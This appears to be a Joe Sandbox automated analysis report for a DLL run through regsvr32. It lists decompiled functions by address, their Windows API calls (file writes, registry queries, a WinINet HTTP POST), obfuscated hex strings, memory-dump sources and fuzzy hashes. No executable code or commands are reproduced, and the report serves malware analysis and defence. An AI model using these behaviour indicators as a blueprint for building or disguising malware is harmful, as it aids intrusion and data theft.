CloseThreadpoolTimer, xrefs: 00007FF983DB901B
CreateThreadpoolWork, xrefs: 00007FF983DB9215
CreateThreadpoolWait, xrefs: 00007FF983DB9032
SleepConditionVariableSRW, xrefs: 00007FF983DB91FE
GetCurrentProcessorNumber, xrefs: 00007FF983DB90A5
ReleaseSRWLockExclusive, xrefs: 00007FF983DB91E7
AcquireSRWLockExclusive, xrefs: 00007FF983DB91B9
GetCurrentPackageId, xrefs: 00007FF983DB90D3
CreateSymbolicLinkW, xrefs: 00007FF983DB90C3
InitializeCriticalSectionEx, xrefs: 00007FF983DB8F63
CloseThreadpoolWait, xrefs: 00007FF983DB9060
SetThreadpoolTimer, xrefs: 00007FF983DB8FED
FlsGetValue, xrefs: 00007FF983DB8F35
FlsAlloc, xrefs: 00007FF983DB8F0E
GetFileInformationByHandleEx, xrefs: 00007FF983DB9101
GetSystemTimePreciseAsFileTime, xrefs: 00007FF983DB912F
CreateSemaphoreW, xrefs: 00007FF983DB8FA8
CloseThreadpoolWork, xrefs: 00007FF983DB9243
CreateEventExW, xrefs: 00007FF983DB8F91
FlsFree, xrefs: 00007FF983DB8F1E
FreeLibraryWhenCallbackReturns, xrefs: 00007FF983DB908E
SubmitThreadpoolWork, xrefs: 00007FF983DB922C
kernel32.dll, xrefs: 00007FF983DB8EFE
LCMapStringEx, xrefs: 00007FF983DB9288
InitializeConditionVariable, xrefs: 00007FF983DB9146
FlushProcessWriteBuffers, xrefs: 00007FF983DB9077
TryAcquireSRWLockExclusive, xrefs: 00007FF983DB91D0
InitOnceExecuteOnce, xrefs: 00007FF983DB8F7A
CreateSemaphoreExW, xrefs: 00007FF983DB8FBF
WakeAllConditionVariable, xrefs: 00007FF983DB9174
WaitForThreadpoolTimerCallbacks, xrefs: 00007FF983DB9004
SetFileInformationByHandle, xrefs: 00007FF983DB9118
CreateThreadpoolTimer, xrefs: 00007FF983DB8FD6
SleepConditionVariableCS, xrefs: 00007FF983DB918B
CompareStringEx, xrefs: 00007FF983DB925A
GetLocaleInfoEx, xrefs: 00007FF983DB9271
InitializeSRWLock, xrefs: 00007FF983DB91A2
WakeConditionVariable, xrefs: 00007FF983DB915D
GetTickCount64, xrefs: 00007FF983DB90EA
SetThreadpoolWait, xrefs: 00007FF983DB9049

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 31aef0777b1de9e4a5d0e70d6233b940c94261a6b1fb32c0ecc6951f39619457
Instruction ID: ffc7e783c32f21049b65c1fcb29794e8f0b45e340749f076c369a9c6d146b1ad
Opcode Fuzzy Hash: 31aef0777b1de9e4a5d0e70d6233b940c94261a6b1fb32c0ecc6951f39619457
Instruction Fuzzy Hash: DCA17DA5A0DB07A1EE05DB90B858A742BA4BF49B44BCA503DC44EE6225EFFCF14DC700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DA52C0, Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 250UNIQUE

Download Yara Rule

Strings

5691c606f068ee66f2b65d8c89de9f993ac27705dbd55f5b, xrefs: 00007FF983DA5318

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5691c606f068ee66f2b65d8c89de9f993ac27705dbd55f5b
API String ID: 0-66563769
Opcode ID: ef56c539fac788341cbbd174a640baf9b45679d56576a349dff745072f2d4928
Instruction ID: 79a693bfef0bd55469a6b00fcb8f1745e633545e3a9f843728b0e19fae800729
Opcode Fuzzy Hash: ef56c539fac788341cbbd174a640baf9b45679d56576a349dff745072f2d4928
Instruction Fuzzy Hash: D3A155A29156C2C4EB10EFB0D895BF92255FF44388FC49539E94E5B58ADEBCF158C340

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DA3910, Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 199UNIQUE

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 00007FF983DA398A

Strings

a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f, xrefs: 00007FF983DA473A
5814200fdccd6a360d77410a1d883cd51c6d3e5af2504a, xrefs: 00007FF983DA39A8
list too long, xrefs: 00007FF983DA463D, 00007FF983DA4668, 00007FF983DA4693, 00007FF983DA46BE, 00007FF983DA46E3

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: 5814200fdccd6a360d77410a1d883cd51c6d3e5af2504a$a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f$list too long
API String ID: 1514166925-2677482326
Opcode ID: 98bdc2807fabc532d9f8cbc4b4b5e9e2d380288cbbdcf934b25f105f5883ba5e
Instruction ID: fee57566fbb3b98cdb226659115f24770d96cd8c46ec4924200c8d7c0f57b09a
Opcode Fuzzy Hash: 98bdc2807fabc532d9f8cbc4b4b5e9e2d380288cbbdcf934b25f105f5883ba5e
Instruction Fuzzy Hash: 4E819A63D2868281E700EBA0E491BBD6364FF45384FC49538E54EA769ADFBCF158C740

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DA2020, Relevance: 52.6, APIs: 35, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c56bb068b1990f9dc96083dc4ab3c177a30c71a3ccd033f6702d8a69f25ecd2e
Instruction ID: 94a158356d6a15d40388cfc193a00fb02d45beaa1888aac9a9e03a42ab443649
Opcode Fuzzy Hash: c56bb068b1990f9dc96083dc4ab3c177a30c71a3ccd033f6702d8a69f25ecd2e
Instruction Fuzzy Hash: 79319D92D6A58384E710F7A064EABBA1159FF06784FC8DC39F54EAB58BDD9E7068C100

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983D9FF20, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 151UNIQUE

Download Yara Rule

Strings

980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29, xrefs: 00007FF983DA0A20

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: CompatibleCreateDesktopFolderLibraryLoadLocalPathTimeWindow
String ID: 980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29
API String ID: 2601952691-677446042
Opcode ID: da83c19f50f070e52fecaaa979e49698d406f453bfd702e0239ec3ceebc086fe
Instruction ID: 752bf41aba87834b3b3479a7e6196cc90cbdee403fb33eea6f0928ae6a95cff3
Opcode Fuzzy Hash: da83c19f50f070e52fecaaa979e49698d406f453bfd702e0239ec3ceebc086fe
Instruction Fuzzy Hash: 8551DCA2E5868281E710FBA0E495BBE2355FF45784FC89538F54E9769ACEBCF448C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D94930, Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 388fileUNIQUE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF983D94A13
CloseHandle.KERNEL32 ref: 00007FF983D94A1C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F59
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F5F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F65
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F6B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F71
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F77
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F7D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F83
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F89
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F95
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94F9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94FA1

Strings

a0dd4dc1ce5277f8a538af9b58b895e980724cad41, xrefs: 00007FF983D94A71
9972d150b78185e350433cf98f8fbb1dbb, xrefs: 00007FF983D94A39
384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19, xrefs: 00007FF983D94AA9

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFileHandleWrite
String ID: 384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19$9972d150b78185e350433cf98f8fbb1dbb$a0dd4dc1ce5277f8a538af9b58b895e980724cad41
API String ID: 971768948-3814959899
Opcode ID: 809e63a630d8751318ffbc35f603ce10ec398286e3e41b0005349b8f20c45a87
Instruction ID: 1ae7df3bf11ac222d957cfab1e754694742f310a18bcc325ce956c77dd6989d6
Opcode Fuzzy Hash: 809e63a630d8751318ffbc35f603ce10ec398286e3e41b0005349b8f20c45a87
Instruction Fuzzy Hash: CC0274A2B1468185EF00DFB4D4847AD2361FB457A8F945235EA6D67BEADFBCE184C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D940B0, Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 376fileUNIQUE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF983D94192
CloseHandle.KERNEL32 ref: 00007FF983D9419B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D946C2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D946C8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D946CE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D946D4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D946DA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D946E0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D946E6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D946EC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D946F2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D946F8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D946FE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D94704
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9470A

Strings

a0dd4dc1ce5277f8a538af9b58b895e980724cad41, xrefs: 00007FF983D941EE
9972d150b78185e350433cf98f8fbb1dbb, xrefs: 00007FF983D941B7
384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19, xrefs: 00007FF983D94225

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFileHandleWrite
String ID: 384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19$9972d150b78185e350433cf98f8fbb1dbb$a0dd4dc1ce5277f8a538af9b58b895e980724cad41
API String ID: 971768948-3814959899
Opcode ID: 2ea32b6012aa963e30e036a40d0186dd1f2715e2be965862b184367db17ea51d
Instruction ID: 0064c10d941ad0fc8198e7a09462518efd3f10788e2cc7c66c88b744bb882abc
Opcode Fuzzy Hash: 2ea32b6012aa963e30e036a40d0186dd1f2715e2be965862b184367db17ea51d
Instruction Fuzzy Hash: F00274A2B2478185EF00DBB8D4847AD2361FB457E8F945235EA6D57ADADFBCE184C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DA7560, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 223networkUNIQUE

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FF983DA7645
InternetConnectW.WININET ref: 00007FF983DA7723
HttpOpenRequestW.WININET ref: 00007FF983DA777D
HttpSendRequestW.WININET ref: 00007FF983DA77BE
GetLastError.KERNEL32 ref: 00007FF983DA77D5
InternetCloseHandle.WININET ref: 00007FF983DA77DE
InternetCloseHandle.WININET ref: 00007FF983DA77E7
InternetCloseHandle.WININET ref: 00007FF983DA77F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA7933
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA7939

Strings

HTTP/1.1, xrefs: 00007FF983DA7773
8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06, xrefs: 00007FF983DA760A
POST, xrefs: 00007FF983DA75C8

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest_invalid_parameter_noinfo_noreturn$ConnectErrorLastSend
String ID: 8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06$HTTP/1.1$POST
API String ID: 2032937867-3540460043
Opcode ID: 1962b22099194d597740632e345c2d5adc0888ccc832e9fd3efc19488b262b62
Instruction ID: 4cf268a93218e76211ca7e7848d6d47c77260f32fac6869f7a24e61ba0631dfa
Opcode Fuzzy Hash: 1962b22099194d597740632e345c2d5adc0888ccc832e9fd3efc19488b262b62
Instruction Fuzzy Hash: 06A137B2A1878181EA10DF95E488B6E6361FB847D4FC44139DA9E9BB94DFBCF048C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DA7EB0, Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 398fileUNIQUE

Download Yara Rule

APIs

GetFileSize.KERNEL32 ref: 00007FF983DA7F4A
ReadFile.KERNEL32 ref: 00007FF983DA7F89
CloseHandle.KERNEL32 ref: 00007FF983DA8324
GetLastError.KERNEL32 ref: 00007FF983DA832F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA8493
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA8499
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA849F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA84A5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA84AB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA84B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA84B7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA84BD

Strings

-XXXXXX, xrefs: 00007FF983DA8256
end, xrefs: 00007FF983DA82F2
%06d, xrefs: 00007FF983DA7FCC

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$File$CloseErrorHandleLastReadSize
String ID: %06d$-XXXXXX$end
API String ID: 3471299532-1274570585
Opcode ID: 0ecef74563c24b76a9510df852a630ee0f49f1fc8c46ff54d3a307185c111e6e
Instruction ID: 4b288c3f18f362154c328070fcc2d34b1cea6ac1a0db5818122da16bd436a40d
Opcode Fuzzy Hash: 0ecef74563c24b76a9510df852a630ee0f49f1fc8c46ff54d3a307185c111e6e
Instruction Fuzzy Hash: 5FF1D4A2B1478185EB00DBB4E584BAD2765FB44798F848139DF5E976E9DFBCE088C340

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D97340, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248UNIQUE

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D976EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D976F5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D976FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D97701
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D97707
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9770D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D97713
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D97719

Strings

a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f, xrefs: 00007FF983D97543
a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd, xrefs: 00007FF983D97619
980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29, xrefs: 00007FF983D9746D
8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba, xrefs: 00007FF983D97397

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: 8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba$980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29$a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd$a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f
API String ID: 3668304517-3861941003
Opcode ID: dcbc1d0d61e6cf4f19e61c4b91773fdb4256cb8feeb72cb799fe0adb705ec7bf
Instruction ID: 35891543b5e14f025dfab1cdd8c80adc1ca3c090b72ce9248171c09c2bf3b50d
Opcode Fuzzy Hash: dcbc1d0d61e6cf4f19e61c4b91773fdb4256cb8feeb72cb799fe0adb705ec7bf
Instruction Fuzzy Hash: 62A151A2F2465184EF00DBB9D884BAD2271BB457A8F845239DE6D67BD9DFBCE045C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D92610, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 226registryUNIQUE

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32 ref: 00007FF983D927A6
RegQueryValueExW.ADVAPI32 ref: 00007FF983D9289C
GetLastError.KERNEL32 ref: 00007FF983D9294D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D92976
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9297C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D92982
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D92988
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9298E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D92994

Strings

6946c029658aeafbefbfdd428c47bd03390da2e6f30da83d815be5d22c0ef7918ba6125441, xrefs: 00007FF983D92853
2c92cd0a32f60eb714d48bd63b6ea2027fa2297712a5f90b43da388dc4c5147933d5441942dab0680bac7beea0bc6c0b49af345b1b9ef9215bd308b1e6e1204b02, xrefs: 00007FF983D92651
772ccc659ff2577755bb035e0fb604fb3477d5c339a586a186523c12699dfc6f7923868c61d2e1fbc712, xrefs: 00007FF983D9275D

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$QueryValue$ErrorLast
String ID: 2c92cd0a32f60eb714d48bd63b6ea2027fa2297712a5f90b43da388dc4c5147933d5441942dab0680bac7beea0bc6c0b49af345b1b9ef9215bd308b1e6e1204b02$6946c029658aeafbefbfdd428c47bd03390da2e6f30da83d815be5d22c0ef7918ba6125441$772ccc659ff2577755bb035e0fb604fb3477d5c339a586a186523c12699dfc6f7923868c61d2e1fbc712
API String ID: 1514591853-3244201323
Opcode ID: 41b2c277796afe2fbe0477f863e8f40f8ced0261d32e2ace28fa52c7208038d3
Instruction ID: 9464393a5042cf0c24e40ac7b8de82c35cc1cb0f89f1c2bd8654d710d7c63e02
Opcode Fuzzy Hash: 41b2c277796afe2fbe0477f863e8f40f8ced0261d32e2ace28fa52c7208038d3
Instruction Fuzzy Hash: EEA181B2B15645D9EF00DFB4D4847AC63A1FB447A8F845239EA1DA7AD9DEBCE148C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB5100, Relevance: 21.2, APIs: 14, Instructions: 176UNIQUE

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF983DB5134
GetFileInformationByHandle.KERNEL32 ref: 00007FF983DB5150

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: File$HandleInformationType
String ID:
API String ID: 4064226416-0
Opcode ID: 118d8c8630ed92c64839bc6533c11c5e4767b421fb3f9fbdd04b5870c2c07e76
Instruction ID: 4da7600b91e6d3b227b1616ce80b4e7ebfef6eba285b636c26fc7e0426da49cd
Opcode Fuzzy Hash: 118d8c8630ed92c64839bc6533c11c5e4767b421fb3f9fbdd04b5870c2c07e76
Instruction Fuzzy Hash: FE717C66F08A4296EB64CBA5E450BBD2761BB44788F844139CE0EA7B58DF7CE44DC740

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DA97D0, Relevance: 19.7, APIs: 13, Instructions: 190networkUNIQUE

Download Yara Rule

APIs

InternetConnectW.WININET ref: 00007FF983DA99C1
InternetCloseHandle.WININET ref: 00007FF983DA99D2
GetLastError.KERNEL32 ref: 00007FF983DA99D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9AA5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9AAB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA9AB1

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
